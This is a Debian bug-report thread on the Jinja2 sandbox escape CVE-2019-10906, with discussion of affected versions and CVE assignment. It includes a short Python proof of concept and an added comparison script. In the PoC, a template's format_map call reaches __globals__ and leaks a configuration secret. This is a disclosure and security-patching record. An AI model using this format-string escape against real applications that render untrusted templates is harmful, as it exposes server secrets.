Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi Hugo,

On Mon, Apr 08, 2019 at 10:20:29PM +0200, Hugo Lefeuvre wrote:
> Hi Salvatore,
>
> > CVE-2016-10745 was assigned for this issue.
>
> Thanks for the information.
>
> I just noticed you added CVE-2016-10745 to the tracker. I am fairly
> confused, do you know why this CVE was not referenced in the tracker?
> Or did you just request it?

It was not referenced, because there was no CVE yet. I was irritated that for the later issue apparently a CVE was assigned, but not for the original first issue, so I requested a CVE for it. It would have showed up on next CVE list update, but given I got the confirmation from MITRE on the assignment I then already added it to the tracker.

So in short, yes I did request the CVE and was assigned yesterday.

Regards,
Salvatore
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi Salvatore,

> CVE-2016-10745 was assigned for this issue.

Thanks for the information.

I just noticed you added CVE-2016-10745 to the tracker. I am fairly confused, do you know why this CVE was not referenced in the tracker? Or did you just request it?

cheers,
Hugo

--
Hugo Lefeuvre (hle)|www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi Hugo,

On Mon, Apr 08, 2019 at 10:04:35AM +0200, Hugo Lefeuvre wrote:
> > This should help confirming vulnerability in other suites.
>
> 2.7.3-1 and all later releases affected. In addition, both 2.7.3-1 and
> 2.8-1 are affected by the previous str.format issue[0].
>
> [0] https://palletsprojects.com/blog/jinja-281-released/

CVE-2016-10745 was assigned for this issue.

Regards,
Salvatore
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
> This should help confirming vulnerability in other suites.

2.7.3-1 and all later releases affected. In addition, both 2.7.3-1 and 2.8-1 are affected by the previous str.format issue[0].

[0] https://palletsprojects.com/blog/jinja-281-released/

--
Hugo Lefeuvre (hle)|www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C
Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Hi,

I'm working on a potential jinja2 Debian LTS security update. Here is a proof of concept which allows to easily reproduce the issue. This should help confirming vulnerability in other suites.

>>> from jinja2.sandbox import SandboxedEnvironment
>>> env = SandboxedEnvironment()
>>> config = {'SECRET_KEY': '12345'}
>>> class User(object):
...     def __init__(self, name):
...         self.name = name
...
>>> t = env.from_string('{{ "{x.__class__.__init__.__globals__[config]}".format_map(dic) }}')
>>> t.render(dic={"x": User('joe')})
"{'SECRET_KEY': '12345'}"

Expected behaviour would be jinja2.exceptions.SecurityError.

Adapted from[0].

regards,
Hugo

[0] https://palletsprojects.com/blog/jinja-281-released/

--
Hugo Lefeuvre (hle)|www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C
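
The PoC works because str.format_map resolves the attribute and index steps of a replacement field itself, so the lookups never pass through the sandbox's attribute checks. The following is an added, stdlib-only illustration of that leak next to a formatter that checks every attribute step; it is not from this thread and not Jinja2's code, and GuardedFormatter, the SecurityError stand-in and the helper names are hypothetical.

```python
# Added illustration, not Jinja2's own code. Stdlib only.
import _string  # CPython helper that string.Formatter itself uses
from string import Formatter

config = {'SECRET_KEY': '12345'}  # constructed secret, same as in the PoC
POC_FIELD = "{x.__class__.__init__.__globals__[config]}"


class User(object):
    def __init__(self, name):
        self.name = name


class SecurityError(Exception):
    """Hypothetical stand-in for jinja2.exceptions.SecurityError."""


class GuardedFormatter(Formatter):
    """Resolve replacement fields, refusing underscore-prefixed attributes."""

    def get_field(self, field_name, args, kwargs):
        first, rest = _string.formatter_field_name_split(field_name)
        obj = self.get_value(first, args, kwargs)
        for is_attr, key in rest:
            if is_attr:
                if key.startswith('_'):
                    raise SecurityError('blocked attribute %r' % key)
                obj = getattr(obj, key)
            else:
                obj = obj[key]
        return obj, first


def plain_format_map(template, mapping):
    # What the sandboxed template ends up calling in the PoC.
    return template.format_map(mapping)


def guarded_format_map(template, mapping):
    # Same result for harmless fields, SecurityError for the PoC field.
    return GuardedFormatter().vformat(template, (), mapping)


if __name__ == '__main__':
    ctx = {"x": User('joe')}
    print(plain_format_map(POC_FIELD, ctx))
    print(guarded_format_map("{x.name}", ctx))
    try:
        guarded_format_map(POC_FIELD, ctx)
    except SecurityError as exc:
        print('SecurityError:', exc)
```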